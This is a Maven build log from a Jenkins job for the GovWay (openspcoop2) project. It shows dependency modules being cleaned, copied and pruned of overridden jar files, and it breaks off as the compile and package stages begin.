[INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.log --- 17:37:23 [INFO] 17:37:23 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.log --- 17:37:23 [INFO] Executing tasks 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/log/slf4j-api-2.0.17.jar 17:37:23 [INFO] Executed tasks 17:37:23 [INFO] 17:37:23 [INFO] ---------------< org.openspcoop2:org.openspcoop2.lucene >--------------- 17:37:23 [INFO] Building dependencies.lucene 1.0 [19/67] 17:37:23 [INFO] from mvn/dependencies/lucene/pom.xml 17:37:23 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.lucene --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/lucene (includes = [*.jar], excludes = []) 17:37:23 [INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.lucene --- 17:37:23 [INFO] 17:37:23 [INFO] -------------< org.openspcoop2:org.openspcoop2.openapi4j >-------------- 17:37:23 [INFO] Building dependencies.openapi4j 1.0 [20/67] 17:37:23 [INFO] from mvn/dependencies/openapi4j/pom.xml 17:37:23 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.openapi4j --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/openapi4j (includes = [*.jar], excludes = []) 17:37:23 [INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.openapi4j --- 17:37:23 [INFO] 17:37:23 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.openapi4j --- 17:37:23 [INFO] Executing tasks 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-core-1.0.7.jar 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-parser-1.0.7.jar 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-schema-validator-1.0.7.jar 17:37:23 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-operation-validator-1.0.7.jar 17:37:23 [INFO] Executed tasks 17:37:23 [INFO] 17:37:23 [INFO] --------------< org.openspcoop2:org.openspcoop2.opensaml >-------------- 17:37:23 [INFO] Building dependencies.opensaml 1.0 [21/67] 17:37:23 [INFO] from mvn/dependencies/opensaml/pom.xml 17:37:23 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:23 [INFO] 17:37:23 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.opensaml --- 17:37:23 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/opensaml (includes = [*.jar], excludes = []) 17:37:23 [INFO] 17:37:23 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.opensaml --- 17:37:24 [INFO] 17:37:24 [INFO] ----------------< org.openspcoop2:org.openspcoop2.pdf >----------------- 17:37:24 [INFO] Building dependencies.pdf 1.0 [22/67] 17:37:24 [INFO] from mvn/dependencies/pdf/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.pdf --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/pdf (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.pdf --- 17:37:24 [INFO] 17:37:24 [INFO] ---------------< org.openspcoop2:org.openspcoop2.redis >---------------- 17:37:24 [INFO] Building dependencies.redis 1.0 [23/67] 17:37:24 [INFO] from mvn/dependencies/redis/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.redis --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/redis (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.redis --- 17:37:24 [INFO] 17:37:24 [INFO] --------------< org.openspcoop2:org.openspcoop2.reports >--------------- 17:37:24 [INFO] Building dependencies.reports 1.0 [24/67] 17:37:24 [INFO] from mvn/dependencies/reports/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.reports --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/reports (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.reports --- 17:37:24 [INFO] 17:37:24 [INFO] ----------------< org.openspcoop2:org.openspcoop2.saaj >---------------- 17:37:24 [INFO] Building dependencies.saaj 1.0 [25/67] 17:37:24 [INFO] from mvn/dependencies/saaj/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.saaj --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/saaj (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.saaj --- 17:37:24 [INFO] 17:37:24 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.saaj --- 17:37:24 [INFO] Executing tasks 17:37:24 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/saaj/saaj-impl-3.0.4.jar 17:37:24 [INFO] Executed tasks 17:37:24 [INFO] 17:37:24 [INFO] --------------< org.openspcoop2:org.openspcoop2.security >-------------- 17:37:24 [INFO] Building dependencies.security 1.0 [26/67] 17:37:24 [INFO] from mvn/dependencies/security/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.security --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/security (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.security --- 17:37:24 [INFO] 17:37:24 [INFO] ---------------< org.openspcoop2:org.openspcoop2.shared >--------------- 17:37:24 [INFO] Building dependencies.shared 1.0 [27/67] 17:37:24 [INFO] from mvn/dependencies/shared/pom.xml 17:37:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:24 [INFO] 17:37:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.shared --- 17:37:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/shared (includes = [*.jar], excludes = []) 17:37:24 [INFO] 17:37:24 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.shared --- 17:37:25 [INFO] 17:37:25 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.shared --- 17:37:25 [INFO] Executing tasks 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/Saxon-HE-12.7.jar 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/snakeyaml-2.4.jar 17:37:25 [INFO] Executed tasks 17:37:25 [INFO] 17:37:25 [INFO] ---------------< org.openspcoop2:org.openspcoop2.spring >--------------- 17:37:25 [INFO] Building dependencies.spring 1.0 [28/67] 17:37:25 [INFO] from mvn/dependencies/spring/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring --- 17:37:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring (includes = [*.jar], excludes = []) 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring --- 17:37:25 [INFO] 17:37:25 [INFO] ------------< org.openspcoop2:org.openspcoop2.spring-ldap >------------- 17:37:25 [INFO] Building dependencies.spring-ldap 1.0 [29/67] 17:37:25 [INFO] from mvn/dependencies/spring-ldap/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-ldap --- 17:37:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring-ldap (includes = [*.jar], excludes = []) 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-ldap --- 17:37:25 [INFO] 17:37:25 [INFO] ----------< org.openspcoop2:org.openspcoop2.spring-security >----------- 17:37:25 [INFO] Building dependencies.spring-security 1.0 [30/67] 17:37:25 [INFO] from mvn/dependencies/spring-security/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-security --- 17:37:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring-security (includes = [*.jar], excludes = []) 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-security --- 17:37:25 [INFO] 17:37:25 [INFO] --------------< org.openspcoop2:org.openspcoop2.swagger >--------------- 17:37:25 [INFO] Building dependencies.swagger 1.0 [31/67] 17:37:25 [INFO] from mvn/dependencies/swagger/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.swagger --- 17:37:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/swagger (includes = [*.jar], excludes = []) 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.swagger --- 17:37:25 [INFO] 17:37:25 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.swagger --- 17:37:25 [INFO] Executing tasks 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-parser-v3-2.1.29.jar 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-request-validator-core-2.44.9.jar 17:37:25 [INFO] Executed tasks 17:37:25 [INFO] 17:37:25 [INFO] ---------------< org.openspcoop2:org.openspcoop2.wss4j >---------------- 17:37:25 [INFO] Building dependencies.wss4j 1.0 [32/67] 17:37:25 [INFO] from mvn/dependencies/wss4j/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.wss4j --- 17:37:25 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/wss4j (includes = [*.jar], excludes = []) 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.wss4j --- 17:37:25 [INFO] 17:37:25 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.wss4j --- 17:37:25 [INFO] Executing tasks 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-common-4.0.0.jar 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-dom-4.0.0.jar 17:37:25 [INFO] Executed tasks 17:37:25 [INFO] 17:37:25 [INFO] -------------< org.openspcoop2:org.openspcoop2.testsuite >-------------- 17:37:25 [INFO] Building dependencies.testsuite 1.0 [33/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.axis14 >---------- 17:37:25 [INFO] Building dependencies.testsuite.axis14 1.0 [34/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/axis14/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.axis14 --- 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.axis14 --- 17:37:25 [INFO] 17:37:25 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.axis14 --- 17:37:25 [INFO] Executing tasks 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-1.4.jar 17:37:25 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-jaxrpc-1.4.jar 17:37:25 [INFO] Executed tasks 17:37:25 [INFO] 17:37:25 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.applicationServer >----- 17:37:25 [INFO] Building dependencies.testsuite.as 1.0 [35/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/applicationServer/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly27 >-- 17:37:25 [INFO] Building dependencies.testsuite.as.wildfly27 1.0 [36/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly27/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:37:25 [INFO] 17:37:25 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly28 >-- 17:37:25 [INFO] Building dependencies.testsuite.as.wildfly28 1.0 [37/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly28/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:37:25 [INFO] 17:37:25 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly35 >-- 17:37:25 [INFO] Building dependencies.testsuite.as.wildfly35 1.0 [38/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly35/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:25 [INFO] 17:37:25 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:37:25 [INFO] 17:37:25 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:37:25 [INFO] 17:37:25 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly36 >-- 17:37:25 [INFO] Building dependencies.testsuite.as.wildfly36 1.0 [39/67] 17:37:25 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly36/pom.xml 17:37:25 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:37:26 [INFO] 17:37:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly37 >-- 17:37:26 [INFO] Building dependencies.testsuite.as.wildfly37 1.0 [40/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly37/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:37:26 [INFO] 17:37:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly38 >-- 17:37:26 [INFO] Building dependencies.testsuite.as.wildfly38 1.0 [41/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly38/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:37:26 [INFO] 17:37:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly39 >-- 17:37:26 [INFO] Building dependencies.testsuite.as.wildfly39 1.0 [42/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly39/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:37:26 [INFO] 17:37:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat10 >-- 17:37:26 [INFO] Building dependencies.testsuite.as.tomcat10 1.0 [43/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat10/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:37:26 [INFO] 17:37:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat11 >-- 17:37:26 [INFO] Building dependencies.testsuite.as.tomcat11 1.0 [44/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat11/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:37:26 [INFO] 17:37:26 [INFO] -----------< org.openspcoop2:org.openspcoop2.testsuite.test >----------- 17:37:26 [INFO] Building dependencies.testsuite.test 1.0 [45/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.testng >-------- 17:37:26 [INFO] Building dependencies.testsuite.test.testng 1.0 [46/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/testng/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.testng --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/testng (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.testng --- 17:37:26 [INFO] 17:37:26 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.junit4 >-------- 17:37:26 [INFO] Building dependencies.testsuite.test.junit4 1.0 [47/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/junit4/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.junit4 --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/junit4 (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.junit4 --- 17:37:26 [INFO] 17:37:26 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.karate09 >------- 17:37:26 [INFO] Building dependencies.testsuite.test.karate09 1.0 [48/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/karate09/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.karate09 --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/karate09 (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.karate09 --- 17:37:26 [INFO] 17:37:26 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.logback >------- 17:37:26 [INFO] Building dependencies.testsuite.test.logback 1.0 [49/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/logback/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.logback --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/logback (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.logback --- 17:37:26 [INFO] 17:37:26 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.httpcore4 >------ 17:37:26 [INFO] Building dependencies.testsuite.test.httpcore4 1.0 [50/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/httpcore4/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/httpcore4 (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:37:26 [INFO] 17:37:26 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.spring5 >------- 17:37:26 [INFO] Building dependencies.testsuite.test.spring5 1.0 [51/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/spring5/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring5 --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring5 (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring5 --- 17:37:26 [INFO] 17:37:26 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.test.spring-ldap2 >----- 17:37:26 [INFO] Building dependencies.testsuite.test.spring-ldap2 1.0 [52/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/spring-ldap2/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring-ldap2 (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:37:26 [INFO] 17:37:26 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.apacheds >------- 17:37:26 [INFO] Building dependencies.testsuite.test.apacheds 1.0 [53/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/apacheds/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:26 [INFO] 17:37:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.apacheds --- 17:37:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds (includes = [*.jar], excludes = []) 17:37:26 [INFO] 17:37:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.apacheds --- 17:37:26 [INFO] 17:37:26 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.test.apacheds --- 17:37:26 [INFO] Executing tasks 17:37:26 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds/apacheds-all-2.0.0.AM27.jar 17:37:26 [INFO] Executed tasks 17:37:26 [INFO] 17:37:26 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.test.cxf3 >--------- 17:37:26 [INFO] Building dependencies.testsuite.test.cxf3 1.0 [54/67] 17:37:26 [INFO] from mvn/dependencies/testsuite/test/cxf3/pom.xml 17:37:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.cxf3 --- 17:37:27 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/cxf3 (includes = [*.jar], excludes = []) 17:37:27 [INFO] 17:37:27 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.cxf3 --- 17:37:27 [INFO] 17:37:27 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.staticAnalysis >------ 17:37:27 [INFO] Building dependencies.testsuite.staticAnalysis 1.0 [55/67] 17:37:27 [INFO] from mvn/dependencies/testsuite/staticAnalysis/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.staticAnalysis --- 17:37:27 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/staticAnalysis (includes = [*.jar], excludes = []) 17:37:27 [INFO] 17:37:27 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.staticAnalysis --- 17:37:27 [INFO] 17:37:27 [INFO] -----< org.openspcoop2:org.openspcoop2.testsuite.dynamicAnalysis >------ 17:37:27 [INFO] Building dependencies.testsuite.dynamicAnalysis 1.0 [56/67] 17:37:27 [INFO] from mvn/dependencies/testsuite/dynamicAnalysis/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:37:27 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/dynamicAnalysis (includes = [*.jar], excludes = []) 17:37:27 [INFO] 17:37:27 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:37:27 [INFO] 17:37:27 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.coverage >--------- 17:37:27 [INFO] Building dependencies.testsuite.coverage 1.0 [57/67] 17:37:27 [INFO] from mvn/dependencies/testsuite/coverage/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.coverage --- 17:37:27 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/coverage (includes = [*.jar], excludes = []) 17:37:27 [INFO] 17:37:27 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.coverage --- 17:37:27 [INFO] 17:37:27 [INFO] --------------< org.openspcoop2:org.openspcoop2.compile >--------------- 17:37:27 [INFO] Building compile 1.0 [58/67] 17:37:27 [INFO] from mvn/compile/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --------------< org.openspcoop2:org.openspcoop2.package >--------------- 17:37:27 